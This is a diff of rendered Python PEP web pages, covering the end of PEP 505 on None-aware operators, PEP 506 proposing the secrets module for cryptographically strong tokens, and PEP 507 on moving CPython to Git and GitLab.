This syntax has an intuitive ordering of the operands. In find_content_type, +for example, the preferred value ctype appears before the fallback value. +The terseness of the syntax also makes for fewer lines of code and less code to +visually parse, and reading from left-to-right and top-to-bottom more accurately +follows the execution flow.

+
+
+
+

Rejected Ideas

+

The first three ideas in this section are oft-proposed alternatives to treating +None as special. For further background on why these are rejected, see their +treatment in PEP 531 and +PEP 532 and the associated +discussions.

+
+

No-Value Protocol

+

The operators could be generalised to user-defined types by defining a protocol +to indicate when a value represents “no value”. Such a protocol may be a dunder +method __has_value__(self) that returns True if the value should be +treated as having a value, and False if the value should be treated as no +value.

+

With this generalization, object would implement a dunder method equivalent +to this:

+
def __has_value__(self):
+    return True
+
+
+

NoneType would implement a dunder method equivalent to this:

+
def __has_value__(self):
+    return False
+
+
+

In the specification section, all uses of x is None would be replaced with +not x.__has_value__().

+
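A runnable sketch of coalescing under this rejected generalization (the Null class and coalesce helper here are hypothetical illustrations of the protocol described above):

class Null:
+    """Domain-specific "no value" object under the rejected protocol."""
+    def __has_value__(self):
+        return False
+
+def coalesce(lhs, rhs):
+    # "lhs is None" becomes "not lhs.__has_value__()"; objects without the
+    # dunder are treated as having a value, matching object's default
+    has_value = getattr(lhs, '__has_value__', lambda: True)
+    return lhs if has_value() else rhs
+
+print(coalesce(Null(), 123))   # 123
+print(coalesce('abc', 123))    # abc
+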

This generalization would allow for domain-specific “no-value” objects to be +coalesced just like None. For example, the pyasn1 package has a type +called Null that represents an ASN.1 null:

+
>>> from pyasn1.type import univ
+>>> univ.Null() ?? univ.Integer(123)
+Integer(123)
+
+
+

Similarly, values such as math.nan and NotImplemented could be treated +as representing no value.

+

However, the “no-value” nature of these values is domain-specific, which means +they should be treated as a value by the language. For example, +math.nan.imag is well defined (it’s 0.0), and so short-circuiting +math.nan?.imag to return math.nan would be incorrect.

+

As None is already defined by the language as being the value that +represents “no value”, and the current specification would not preclude +switching to a protocol in the future (though changes to built-in objects would +not be compatible), this idea is rejected for now.

+
+
+

Boolean-aware operators

+

This suggestion is fundamentally the same as adding a no-value protocol, and so +the discussion above also applies.

+

Similar behavior to the ?? operator can be achieved with an or +expression; however, or checks whether its left operand is falsy, not +specifically None. This approach is attractive, as it requires fewer changes +to the language, but ultimately does not solve the underlying problem correctly.

+
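A small runnable sketch of the difference, using a helper function as a stand-in for the proposed operator (unlike the real ??, the helper evaluates its right operand eagerly):

def none_coalesce(lhs, rhs):
+    # Stand-in for the proposed "lhs ?? rhs": only None triggers the fallback
+    return lhs if lhs is not None else rhs
+
+headers = {}
+print(headers or {'default': True})               # {'default': True}: falsy {} is replaced
+print(none_coalesce(headers, {'default': True}))  # {}: an empty dict is a real value
+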

Assuming the check is for truthiness rather than None, there is no longer a +need for the ?? operator. However, applying this check to the ?. and +?[] operators prevents perfectly valid operations from applying.

+

Consider the following example, where get_log_list() may return either a +list containing current log messages (potentially empty), or None if logging +is not enabled:

+
lst = get_log_list()
+lst?.append('A log message')
+
+
+

If ?. is checking for true values rather than specifically None and the +log has not been initialized with any items, no item will ever be appended. This +violates the obvious intent of the code, which is to append an item. The +append method is available on an empty list, as are all other list methods, +and there is no reason to assume that these members should not be used because +the list is presently empty.

+

Further, there is no sensible result to use in place of the expression. A +normal lst.append returns None, but under this idea lst?.append may +result in either [] or None, depending on the value of lst. As with +the examples in the previous section, this makes no sense.

+

As checking for truthiness rather than None results in apparently valid +expressions no longer executing as intended, this idea is rejected.

+
+
+

Exception-aware operators

+

Arguably, the reason to short-circuit an expression when None is encountered +is to avoid the AttributeError or TypeError that would be raised under +normal circumstances. As an alternative to testing for None, the ?. and +?[] operators could instead handle AttributeError and TypeError +raised by the operation and skip the remainder of the expression.

+

This produces a transformation for a?.b.c?.d.e similar to this:

+
_v = a
+try:
+    _v = _v.b
+except AttributeError:
+    pass
+else:
+    _v = _v.c
+    try:
+        _v = _v.d
+    except AttributeError:
+        pass
+    else:
+        _v = _v.e
+
+
+

One open question is which value should be returned as the expression when an +exception is handled. The above example simply leaves the partial result, but +this is not helpful for replacing with a default value. An alternative would be +to force the result to None, which then raises the question as to why +None is special enough to be the result but not special enough to be the +test.

+

Secondly, this approach masks errors within code executed implicitly as part of +the expression. For ?., any AttributeError within a property or +__getattr__ implementation would be hidden, and similarly for ?[] and +__getitem__ implementations.

+

Similarly, simple typing errors such as {}?.ietms() could go unnoticed.

+

Existing conventions for handling these kinds of errors in the form of the +getattr builtin and the .get(key, default) method pattern established by +dict show that it is already possible to explicitly use this behaviour.

+

As this approach would hide errors in code, it is rejected.

+
+
+

None-aware Function Call

+

The None-aware syntax applies to attribute and index access, so it seems +natural to ask if it should also apply to function invocation syntax. It might +be written as foo?(), where foo is only called if it is not None.

+

This has been deferred on the basis of the proposed operators being intended +to aid traversal of partially populated hierarchical data structures, not +for traversal of arbitrary class hierarchies. This is reflected in the fact +that none of the other mainstream languages that already offer this syntax +have found it worthwhile to support a similar syntax for optional function +invocations.

+

A workaround similar to that used by C# would be to write +maybe_none?.__call__(arguments). If the callable is None, the +expression will not be evaluated. (The C# equivalent uses ?.Invoke() on its +callable type.)

+
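In current Python the same effect requires an explicit test; a minimal illustrative helper (call_if_not_none is a hypothetical name, not part of this proposal):

def call_if_not_none(fn, *args, **kwargs):
+    # Mirrors the described maybe_none?.__call__(arguments) workaround
+    return fn(*args, **kwargs) if fn is not None else None
+
+callback = None
+print(call_if_not_none(callback, 42))       # None: the call is skipped
+print(call_if_not_none(str.upper, 'abc'))   # ABC
+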
+
+

? Unary Postfix Operator

+

To generalize the None-aware behavior and limit the number of new operators +introduced, a unary, postfix operator spelled ? was suggested. The idea is +that ? might return a special object that would override dunder +methods that return self. For example, foo? would evaluate to foo if +it is not None, otherwise it would evaluate to an instance of +NoneQuestion:

+
class NoneQuestion():
+    def __call__(self, *args, **kwargs):
+        return self
+
+    def __getattr__(self, name):
+        return self
+
+    def __getitem__(self, key):
+        return self
+
+
+

With this new operator and new type, an expression like foo?.bar[baz] +evaluates to NoneQuestion if foo is None. This is a nifty +generalization, but it’s difficult to use in practice since most existing code +won’t know what NoneQuestion is.

+

Going back to one of the motivating examples above, consider the following:

+
>>> import json
+>>> created = None
+>>> json.dumps({'created': created?.isoformat()})
+
+
+

The JSON serializer does not know how to serialize NoneQuestion, nor will +any other API. This proposal actually requires lots of specialized logic +throughout the standard library and any third party library.

+

At the same time, the ? operator may also be too general, in the sense +that it can be combined with any other operator. What should the following +expressions mean?:

+
>>> x? + 1
+>>> x? -= 1
+>>> x? == 1
+>>> ~x?
+
+
+

This degree of generalization is not useful. The operators actually proposed +herein are intentionally limited to a few operators that are expected to make it +easier to write common code patterns.

+
+
+

Built-in maybe

+

Haskell has a concept called Maybe that +encapsulates the idea of an optional value without relying on any special +keyword (e.g. null) or any special instance (e.g. None). In Haskell, the +purpose of Maybe is to avoid separate handling of “something” and “nothing”.

+

A Python package called pymaybe provides a +rough approximation. The documentation shows the following example:

+
>>> maybe('VALUE').lower()
+'value'
+
+>>> maybe(None).invalid().method().or_else('unknown')
+'unknown'
+
+
+

The function maybe() returns either a Something instance or a +Nothing instance. Similar to the unary postfix operator described in the +previous section, Nothing overrides dunder methods in order to allow +chaining on a missing value.

+

Note that or_else() is eventually required to retrieve the underlying value +from pymaybe’s wrappers. Furthermore, pymaybe does not short-circuit any +evaluation. Although pymaybe has some strengths and may be useful in its own +right, it also demonstrates why a pure Python implementation of coalescing is +not nearly as powerful as support built into the language.

+

The idea of adding a builtin maybe type to enable this scenario is rejected.

+
+
+

Just use a conditional expression

+

Another common way to initialize default values is to use the ternary operator. +Here is an excerpt from the popular Requests package:

+
data = [] if data is None else data
+files = [] if files is None else files
+headers = {} if headers is None else headers
+params = {} if params is None else params
+hooks = {} if hooks is None else hooks
+
+
+

This particular formulation has the undesirable effect of putting the operands +in an unintuitive order: the brain thinks, “use data if possible and use +[] as a fallback,” but the code puts the fallback before the preferred +value.

+

The author of this package could have written it like this instead:

+
data = data if data is not None else []
+files = files if files is not None else []
+headers = headers if headers is not None else {}
+params = params if params is not None else {}
+hooks = hooks if hooks is not None else {}
+
+
+

This ordering of the operands is more intuitive, but it requires 4 extra +characters (for “not “). It also highlights the repetition of identifiers: +data if data, files if files, etc.

+

When written using the None coalescing operator, the sample reads:

+
data = data ?? []
+files = files ?? []
+headers = headers ?? {}
+params = params ?? {}
+hooks = hooks ?? {}
+
+
+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0505.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0506/index.html b/pep-0506/index.html new file mode 100644 index 00000000000..cf7e4310cf8 --- /dev/null +++ b/pep-0506/index.html @@ -0,0 +1,587 @@ + PEP 506 – Adding A Secrets Module To The Standard Library | peps.python.org +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 506 – Adding A Secrets Module To The Standard Library

+
+
Author:
+
Steven D’Aprano <steve at pearwood.info>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
19-Sep-2015
+
Python-Version:
+
3.6
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes the addition of a module for common security-related +functions such as generating tokens to the Python standard library.

+
+
+

Definitions

+

Some common abbreviations used in this proposal:

+
    +
  • PRNG:

    Pseudo Random Number Generator. A deterministic algorithm used +to produce random-looking numbers with certain desirable +statistical properties.

    +
  • +
  • CSPRNG:

    Cryptographically Strong Pseudo Random Number Generator. An +algorithm used to produce random-looking numbers which are +resistant to prediction.

    +
  • +
  • MT:

    Mersenne Twister. An extensively studied PRNG which is currently +used by the random module as the default.

    +
  • +
+
+
+

Rationale

+

This proposal is motivated by concerns that Python’s standard library +makes it too easy for developers to inadvertently make serious security +errors. Theo de Raadt, the founder of OpenBSD, contacted Guido van Rossum +and expressed some concern [1] about the use of MT for generating sensitive +information such as passwords, secure tokens, session keys and similar.

+

Although the documentation for the random module explicitly states that +the default is not suitable for security purposes [2], it is strongly +believed that this warning may be missed, ignored or misunderstood by +many Python developers. In particular:

+
    +
  • developers may not have read the documentation and consequently +not seen the warning;
  • +
  • they may not realise that their specific use of the module has security +implications; or
  • +
  • not realising that there could be a problem, they have copied code +(or learned techniques) from websites which don’t offer best +practices.
  • +
+

The first [3] hit when searching for “python how to generate passwords” on +Google is a tutorial that uses the default functions from the random +module [4]. Although it is not intended for use in web applications, it is +likely that similar techniques find themselves used in that situation. +The second hit is a StackOverflow question about generating +passwords [5]. Most of the answers given, including the accepted one, use +the default functions. When one user warned that the default could be +easily compromised, they were told “I think you worry too much.” [6]

+
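For contrast, here is a sketch of the tutorial-style pattern next to the pattern this PEP encourages (secrets.choice as proposed below); both lines are illustrative only:

import random, secrets, string
+
+alphabet = string.ascii_letters + string.digits
+
+# Pattern commonly taught in tutorials: deterministic MT, predictable output
+weak = ''.join(random.choice(alphabet) for _ in range(12))
+
+# Pattern this PEP encourages: the system CSPRNG via the proposed secrets.choice
+strong = ''.join(secrets.choice(alphabet) for _ in range(12))
+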

This strongly suggests that the existing random module is an attractive +nuisance when it comes to generating (for example) passwords or secure +tokens.

+

Additional motivation (of a more philosophical bent) can be found in the +post which first proposed this idea [7].

+
+
+

Proposal

+

Alternative proposals have focused on the default PRNG in the random +module, with the aim of providing “secure by default” cryptographically +strong primitives that developers can build upon without thinking about +security. (See Alternatives below.) This proposes a different approach:

+
    +
  • The standard library already provides cryptographically strong +primitives, but many users don’t know they exist or when to use them.
  • +
  • Instead of requiring crypto-naive users to write secure code, the +standard library should include a set of ready-to-use “batteries” for +the most common needs, such as generating secure tokens. This code +will both directly satisfy a need (“How do I generate a password reset +token?”), and act as an example of acceptable practices which +developers can learn from [8].
  • +
+

To do this, this PEP proposes that we add a new module to the standard +library, with the suggested name secrets. This module will contain a +set of ready-to-use functions for common activities with security +implications, together with some lower-level primitives.

+

The suggestion is that secrets becomes the go-to module for dealing +with anything which should remain secret (passwords, tokens, etc.) +while the random module remains backward-compatible.

+
+
+

API and Implementation

+

This PEP proposes the following functions for the secrets module:

+
    +
  • Functions for generating tokens suitable for use in (e.g.) password +recovery, as session keys, etc., in the following formats:
      +
    • as bytes, secrets.token_bytes;
    • +
    • as text, using hexadecimal digits, secrets.token_hex;
    • +
    • as text, using URL-safe base-64 encoding, secrets.token_urlsafe.
    • +
    +
  • +
  • A limited interface to the system CSPRNG, using either os.urandom +directly or random.SystemRandom. Unlike the random module, this +does not need to provide methods for seeding, getting or setting the +state, or any non-uniform distributions. It should provide the +following:
      +
    • A function for choosing items from a sequence, secrets.choice.
    • +
    • A function for generating a given number of random bits and/or bytes +as an integer, secrets.randbits.
    • +
    • A function for returning a random integer in the half-open range +0 to the given upper limit, secrets.randbelow [9].
    • +
    +
  • +
  • A function for comparing text or bytes digests for equality while being +resistant to timing attacks, secrets.compare_digest.
  • +
+

The consensus appears to be that there is no need to add a new CSPRNG to +the random module to support these uses; SystemRandom will be +sufficient.

+

Some illustrative implementations have been given by Alyssa (Nick) Coghlan [10] +and a minimalist API by Tim Peters [11]. This idea has also been discussed +on the issue tracker for the “cryptography” module [12]. The following +pseudo-code should be taken as the starting point for the real +implementation:

+
from random import SystemRandom
+from hmac import compare_digest
+
+_sysrand = SystemRandom()
+
+randbits = _sysrand.getrandbits
+choice = _sysrand.choice
+
+def randbelow(exclusive_upper_bound):
+    return _sysrand._randbelow(exclusive_upper_bound)
+
+DEFAULT_ENTROPY = 32  # bytes
+
+def token_bytes(nbytes=None):
+    if nbytes is None:
+        nbytes = DEFAULT_ENTROPY
+    return os.urandom(nbytes)
+
+def token_hex(nbytes=None):
+    return binascii.hexlify(token_bytes(nbytes)).decode('ascii')
+
+def token_urlsafe(nbytes=None):
+    tok = token_bytes(nbytes)
+    return base64.urlsafe_b64encode(tok).rstrip(b'=').decode('ascii')
+
+
+

The secrets module itself will be pure Python, and other Python +implementations can easily make use of it unchanged, or adapt it as +necessary. An implementation can be found on BitBucket [13].

+
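Assuming the names given in the pseudo-code above, typical use of the proposed module might look like this sketch:

import secrets
+
+reset_token = secrets.token_urlsafe(32)    # e.g. for a password-reset URL
+session_key = secrets.token_hex(16)        # 32 hexadecimal digits
+raw = secrets.token_bytes()                # DEFAULT_ENTROPY bytes
+roll = secrets.randbelow(6) + 1            # uniform integer from 1 to 6
+card = secrets.choice(['spades', 'hearts', 'diamonds', 'clubs'])
+ok = secrets.compare_digest(reset_token, reset_token)   # timing-safe comparison
+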
+

Default arguments

+

One difficult question is “How many bytes should my token be?”. We can +help with this question by providing a default amount of entropy for the +“token_*” functions. If the nbytes argument is None or not given, the +default entropy will be used. This default value should be large enough +to be expected to be secure for medium-security uses, but is expected to +change in the future, possibly even in a maintenance release [14].

+
+
+

Naming conventions

+

One question is the naming conventions used in the module [15], whether to +use C-like naming conventions such as “randrange” or more Pythonic names +such as “random_range”.

+

Functions which are simply bound methods of the private SystemRandom +instance (e.g. randrange), or a thin wrapper around such, should keep +the familiar names. Those which are something new (such as the various +token_* functions) will use more Pythonic names.

+
+
+
+

Alternatives

+

One alternative is to change the default PRNG provided by the random +module [16]. This received considerable scepticism and outright opposition:

+
    +
  • There is fear that a CSPRNG may be slower than the current PRNG (which +in the case of MT is already quite slow).
  • +
  • Some applications (such as scientific simulations, and replaying +gameplay) require the ability to seed the PRNG into a known state, +which a CSPRNG lacks by design.
  • +
  • Another major use of the random module is for simple “guess a number” +games written by beginners, and many people are loath to make any +change to the random module which may make that harder.
  • +
  • Although there is no proposal to remove MT from the random module, +there was considerable hostility to the idea of having to opt-in to +a non-CSPRNG or any backwards-incompatible changes.
  • +
  • Demonstrated attacks against MT are typically against PHP applications. +It is believed that PHP’s version of MT is a significantly softer target +than Python’s version, due to a poor seeding technique [17]. Consequently, +without a proven attack against Python applications, many people object +to a backwards-incompatible change.
  • +
+

Alyssa Coghlan made an earlier suggestion +for a globally configurable PRNG +which uses the system CSPRNG by default, but has since withdrawn it +in favour of this proposal.

+
+
+

Comparison To Other Languages

+
    +
  • PHP

    PHP includes a function uniqid [18] which by default returns a +thirteen character string based on the current time in microseconds. +Translated into Python syntax, it has the following signature:

    +
    def uniqid(prefix='', more_entropy=False)->str
    +
    +
    +

    The PHP documentation warns that this function is not suitable for +security purposes. Nevertheless, various mature, well-known PHP +applications use it for that purpose (citation needed).

    +

    PHP 5.3 and better also includes a function openssl_random_pseudo_bytes +[19]. Translated into Python syntax, it has roughly the following +signature:

    +
    def openssl_random_pseudo_bytes(length:int)->Tuple[str, bool]
    +
    +
    +

    This function returns a pseudo-random string of bytes of the given +length, and a boolean flag giving whether the string is considered +cryptographically strong. The PHP manual suggests that returning +anything but True should be rare except for old or broken platforms.

    +
  • +
  • JavaScript

    Based on a rather cursory search [20], there do not appear to be any +well-known standard functions for producing strong random values in +JavaScript. Math.random is often used, despite serious weaknesses +making it unsuitable for cryptographic purposes [21]. In recent years +the majority of browsers have gained support for window.crypto.getRandomValues [22].

    +

    Node.js offers a rich cryptographic module, crypto [23], most of +which is beyond the scope of this PEP. It does include a single function +for generating random bytes, crypto.randomBytes.

    +
  • +
  • Ruby

    The Ruby standard library includes a module SecureRandom [24] +which includes the following methods:

    +
      +
    • base64 - returns a Base64 encoded random string.
    • +
    • hex - returns a random hexadecimal string.
    • +
    • random_bytes - returns a random byte string.
    • +
    • random_number - depending on the argument, returns either a random +integer in the range(0, n), or a random float between 0.0 and 1.0.
    • +
    • urlsafe_base64 - returns a random URL-safe Base64 encoded string.
    • +
    • uuid - return a version 4 random Universally Unique IDentifier.
    • +
    +
  • +
+
+
+

What Should Be The Name Of The Module?

+

There was a proposal to add a “random.safe” submodule, quoting the Zen +of Python “Namespaces are one honking great idea” koan. However, the +author of the Zen, Tim Peters, has come out against this idea [25], and +recommends a top-level module.

+

In discussion on the python-ideas mailing list so far, the name “secrets” +has received some approval, and no strong opposition.

+

There is already an existing third-party module with the same name [26], +but it appears to be unused and abandoned.

+
+
+

Frequently Asked Questions

+
    +
  • Q: Is this a real problem? Surely MT is random enough that nobody can +predict its output.

    A: The consensus among security professionals is that MT is not safe +in security contexts. It is not difficult to reconstruct the internal +state of MT [27] [28] and so predict all past and future values. There +are a number of known, practical attacks on systems using MT for +randomness [29].

    +
  • +
  • Q: Attacks on PHP are one thing, but are there any known attacks on +Python software?

    A: Yes. There have been vulnerabilities in Zope and Plone at the very +least. Hanno Schlichting commented [30]:

    +
    "In the context of Plone and Zope a practical attack was
    +demonstrated, but I can't find any good non-broken links about
    +this anymore.  IIRC Plone generated a random number and exposed
    +this on each error page along the lines of 'Sorry, you encountered
    +an error, your problem has been filed as <random number>, please
    +include this when you contact us'.  This allowed anyone to do large
    +numbers of requests to this page and get enough random values to
    +reconstruct the MT state.  A couple of security related modules used
    +random instead of system random (cookie session ids, password reset
    +links, auth token), so the attacker could break all of those."
    +
    +
    +

    Christian Heimes reported this issue to the Zope security team in 2012 [31], +there are at least two related CVE vulnerabilities [32], and at least one +work-around for this issue in Django [33].

    +
  • +
  • Q: Is this an alternative to specialist cryptographic software such as SSL?

    A: No. This is a “batteries included” solution, not a full-featured +“nuclear reactor”. It is intended to mitigate against some basic +security errors, not be a solution to all security-related issues. To +quote Alyssa Coghlan referring to her earlier proposal [34]:

    +
    "...folks really are better off learning to use things like
    +cryptography.io for security sensitive software, so this change
    +is just about harm mitigation given that it's inevitable that a
    +non-trivial proportion of the millions of current and future
    +Python developers won't do that."
    +
    +
    +
  • +
  • Q: What about a password generator?

    A: The consensus is that the requirements for password generators are too +variable for it to be a good match for the standard library [35]. No password +generator will be included in the initial release of the module, instead it +will be given in the documentation as a recipe (à la the recipes in the +itertools module) [36].

    +
  • +
  • Q: Will secrets use /dev/random (which blocks) or /dev/urandom (which +doesn’t block) on Linux? What about other platforms?

    A: secrets will be based on os.urandom and random.SystemRandom, +which are interfaces to your operating system’s best source of cryptographic +randomness. On Linux, that may be /dev/urandom [37], on Windows it may be +CryptGenRandom(), but see the documentation and/or source code for the +detailed implementation details.

    +
  • +
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0506.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0507/index.html b/pep-0507/index.html new file mode 100644 index 00000000000..a011b231d9a --- /dev/null +++ b/pep-0507/index.html @@ -0,0 +1,424 @@ + PEP 507 – Migrate CPython to Git and GitLab | peps.python.org +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 507 – Migrate CPython to Git and GitLab

+
+
Author:
+
Barry Warsaw <barry at python.org>
+
Status:
+
Rejected
+
Type:
+
Process
+
Created:
+
30-Sep-2015
+
Post-History:
+

+
Resolution:
+
Core-Workflow message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes migrating the repository hosting of CPython and the +supporting repositories to Git. Further, it proposes adopting a +hosted GitLab instance as the primary way of handling merge requests, +code reviews, and code hosting. It is similar in intent to PEP 481 +but proposes an open source alternative to GitHub and omits the +proposal to run Phabricator. As with PEP 481, this particular PEP is +offered as an alternative to PEP 474 and PEP 462.

+
+
+

Rationale

+

CPython is an open source project which relies on a number of +volunteers donating their time. As with any healthy, vibrant open +source project, it relies on attracting new volunteers as well as +retaining existing developers. Given that volunteer time is the most +scarce resource, providing a process that maximizes the efficiency of +contributors and reduces the friction for contributions is of vital +importance for the long-term health of the project.

+

The current tool chain of the CPython project is a custom and unique +combination of tools. This has two critical implications:

+
    +
  • The unique nature of the tool chain means that contributors must +remember or relearn the process, workflow, and tools whenever they +contribute to CPython, without the advantage of leveraging the long-term +memory and familiarity they retain by working with other projects in +the FLOSS ecosystem. The knowledge they gain in working with +CPython is unlikely to be applicable to other projects.
  • +
  • The burden on the Python/PSF infrastructure team is much greater in +order to continue to maintain custom tools, improve them over time, +fix bugs, address security issues, and more generally adapt to new +standards in online software development with global collaboration.
  • +
+

These limitations act as a barrier to contribution both for highly +engaged contributors (e.g. core Python developers) and especially for +more casual “drive-by” contributors, who care more about getting their +bug fix than learning a new suite of tools and workflows.

+

By proposing the adoption of both a different version control system +and a modern, well-maintained hosting solution, this PEP addresses +these limitations. It aims to enable a modern, well-understood +process that will carry CPython development for many years.

+
+

Version Control System

+

Currently the CPython and supporting repositories use Mercurial. As a +modern distributed version control system, it has served us well since +the migration from Subversion. However, when evaluating the VCS we +must consider the capabilities of the VCS itself as well as the +network effect and mindshare of the community around that VCS.

+

There are really only two options for this: Mercurial and Git. +The technical capabilities of the two systems are largely equivalent; +therefore, this PEP instead focuses on their social aspects.

+

It is not possible to get exact numbers for the number of projects or +people which are using a particular VCS; however, we can infer this by +looking at several sources of information about which VCS projects are +using.

+

The Open Hub (previously Ohloh) statistics [1] show that +37% of the repositories indexed by The Open Hub are using Git (second +only to Subversion which has 48%) while Mercurial has just 2%, beating +only Bazaar which has 1%. This has Git being just over 18 times as +popular as Mercurial on The Open Hub.

+

Another source of information on VCS popularity is PyPI itself. This +source is more targeted at the Python community itself since it +represents projects developed for Python. Unfortunately PyPI does not +have a standard location for representing this information, so this +requires manual processing. If we limit our search to the top 100 +projects on PyPI (ordered by download counts) we can see that 62% of +them use Git, while 22% of them use Mercurial, and 13% use something +else. This has Git being just under 3 times as popular as Mercurial +for the top 100 projects on PyPI.

+

These numbers back up the anecdotal evidence for Git as the far more +popular DVCS for open source projects. Choosing the more popular VCS +has a number of positive benefits.

+

For new contributors it increases the likelihood that they will have already +learned the basics of Git as part of working with another project, or if they +are just now learning Git, that they’ll be able to take that knowledge and +apply it to other projects. Additionally, a larger community means more people +writing how-to guides, answering questions, and writing articles about Git, +which makes it easier for a new user to find answers and information about the +tool they are trying to learn and use. Given its popularity, there may also +be more auxiliary tooling written around Git. This increases options for +everything from GUI clients, helper scripts, repository hosting, etc.

+

Further, the adoption of Git as the proposed back-end repository +format doesn’t prohibit the use of Mercurial by fans of that VCS! +Mercurial users have the hg-git [2] plugin which allows them to push +and pull from a Git server using the Mercurial front-end. It’s a +well-maintained and highly functional plugin that seems to be +well-liked by Mercurial users.

+
+
+

Repository Hosting

+

Where and how the official repositories for CPython are hosted is in +some ways determined by the choice of VCS. With Git there are several +options. In fact, once the repository is hosted in Git, branches can +be mirrored in many locations, within many free, open, and proprietary +code hosting sites.

+

It’s still important for CPython to adopt a single, official +repository, with a web front-end that allows for many convenient and +common interactions entirely through the web, without always requiring +local VCS manipulations. These interactions include, as a minimum, +code review with inline comments, branch diffing, CI integration, and +auto-merging.

+

This PEP proposes to adopt a GitLab [3] instance, run within the +python.org domain, accessible to and with ultimate control from the +PSF and the Python infrastructure team, but donated, hosted, and +primarily maintained by GitLab, Inc.

+

Why GitLab? Because it is a fully functional Git hosting system, that +sports modern web interactions, software workflows, and CI +integration. GitLab’s Community Edition (CE) is open source software, +and thus is closely aligned with the principles of the CPython +community.

+
+
+

Code Review

+

Currently CPython uses a custom fork of Rietveld modified to not run +on Google App Engine, and which is only really maintained by +one person. It is missing common features present in many modern code +review tools.

+

This PEP proposes to utilize GitLab’s built-in merge requests and +online code review features to facilitate reviews of all proposed +changes.

+
+
+

GitLab merge requests

+

The normal workflow for a GitLab hosted project is to submit a merge request +asking that a feature or bug fix branch be merged into a target branch, +usually one or more of the stable maintenance branches or the next-version +master branch for new features. GitLab’s merge requests are similar in form +and function to GitHub’s pull requests, so anybody who is already familiar +with the latter should be able to immediately utilize the former.

+

Once submitted, a conversation about the change can be had between the +submitter and reviewer. This includes both general comments, and inline +comments attached to a particular line of the diff between the source and +target branches. Projects can also be configured to automatically run +continuous integration on the submitted branch, the results of which are +readily visible from the merge request page. Thus both the reviewer and +submitter can immediately see the results of the tests, making it much easier +to only land branches with passing tests. Each new push to the source branch +(e.g. to respond to a commenter’s feedback or to fix a failing test) results +in a new run of the CI, so that the state of the request always reflects the +latest commit.

+

Merge requests have a fairly major advantage over the older “submit a patch to +a bug tracker” model. They allow developers to work completely within the VCS +using standard VCS tooling, without requiring the creation of a patch file or +figuring out the right location to upload the patch to. This lowers the +barrier for sending a change to be reviewed.

+

Merge requests are far easier to review. For example, they provide nice +syntax highlighted diffs which can operate in either unified or side by side +views. They allow commenting inline and on the merge request as a whole and +they present that in a nice unified way which will also hide comments which no +longer apply. Comments can be hidden and revealed.

+

Actually merging a merge request is quite simple, if the source branch applies +cleanly to the target branch. A core reviewer simply needs to press the +“Merge” button for GitLab to automatically perform the merge. The source +branch can be optionally rebased, and once the merge is completed, the source +branch can be automatically deleted.

+

GitLab also has a good workflow for submitting pull requests to a project +completely through their web interface. This would enable the Python +documentation to have “Edit on GitLab” buttons on every page, so that people +who discover typos or inaccuracies, or who just want to improve the docs they +are currently reading, can simply hit that button and get an in-browser editor +that lets them make changes and submit a merge request, all from the comfort +of their browser.

+
+
+
+

Criticism

+
+

X is not written in Python

+

One feature that the current tooling (Mercurial, Rietveld) has is that the +primary language for all of the pieces are written in Python. This PEP +focuses more on the best tools for the job and not necessarily on the best +tools that happen to be written in Python. Volunteer time is the most +precious resource for any open source project and we can best respect and +utilize that time by focusing on the benefits and downsides of the tools +themselves rather than what language their authors happened to write them in.

+

One concern is the ability to modify tools to work for us; however, one of the +goals here is to not modify software to work for us and instead adapt +ourselves to a more standardized workflow. This standardization pays off in +the ability to re-use tools out of the box, freeing up developer time to +actually work on Python itself, as well as enabling knowledge sharing between +projects.

+

However, if we do need to modify the tooling, Git itself is largely +written in C, the same as CPython itself. It can also have commands +written for it in any language, including Python. GitLab itself is largely +written in Ruby, and since it is Open Source software, we would have the +ability to submit merge requests to the upstream Community Edition, albeit +in a language potentially unfamiliar to most Python programmers.

+
+
+

Mercurial is better than Git

+

Whether Mercurial or Git is better on a technical level is a highly +subjective opinion. This PEP does not state whether the mechanics of Git +or Mercurial are better, and instead focuses on the network effect that is +available for either option. While this PEP proposes switching to Git, +Mercurial users are not left completely out of the loop. With the hg-git +extension for Mercurial, working with server-side Git repositories is +fairly easy and straightforward.

+
+
+

CPython Workflow is too Complicated

+

One sentiment that came out of previous discussions was that the multi-branch +model of CPython was too complicated for GitLab style merge requests. This +PEP disagrees with that sentiment.

+

Currently any particular change requires manually creating a patch for 2.7 +and 3.x, which won’t change at all in this regard.

+

If someone submits a fix for the current stable branch (e.g. 3.5) the +merge request workflow can be used to create a request to merge the +current stable branch into the master branch, assuming there are no merge +conflicts. As always, merge conflicts must be resolved manually and +locally. Because developers also have the option of performing the merge +locally, this provides an improvement over the current situation where the +merge must always happen locally.

+

For fixes in the current development branch that must also be applied to +stable release branches, it is possible in many situations to locally +cherry pick and apply the change to other branches, with merge requests +submitted for each stable branch. It is also possible to just cherry pick +and complete the merge locally. These are all accomplished with standard +Git commands and techniques, with the advantage that all such changes can +go through the review and CI test workflows, even for merges to stable +branches. Minor changes may be easily accomplished in the GitLab web +editor.

+

No system can hide all the complexities involved in maintaining several +long-lived branches. The only thing that the tooling can do is make it as +easy as possible to submit and commit changes.

+
+
+
+

Open issues

+
    +
  • What level of hosted support will GitLab offer? The PEP author has been in +contact with the GitLab CEO, with positive interest on their part. The +details of the hosting offer would have to be discussed.
  • +
  • What happens to Roundup and do we switch to the GitLab issue tracker? +Currently, this PEP is not suggesting we move from Roundup to GitLab +issues. We have way too much invested in Roundup right now and migrating +the data would be a huge effort. GitLab does support webhooks, so we will +probably want to use webhooks to integrate merges and other events with +updates to Roundup (e.g. to include pointers to commits, close issues, +etc. similar to what is currently done).
  • +
  • What happens to wiki.python.org? Nothing! While GitLab does support wikis +in repositories, there’s no reason for us to migrate our Moin wikis.
  • +
  • What happens to the existing GitHub mirrors? We’d probably want to +regenerate them once the official upstream branches are natively hosted in +Git. This may change commit ids, but after that, it should be easy to +mirror the official Git branches and repositories far and wide.
  • +
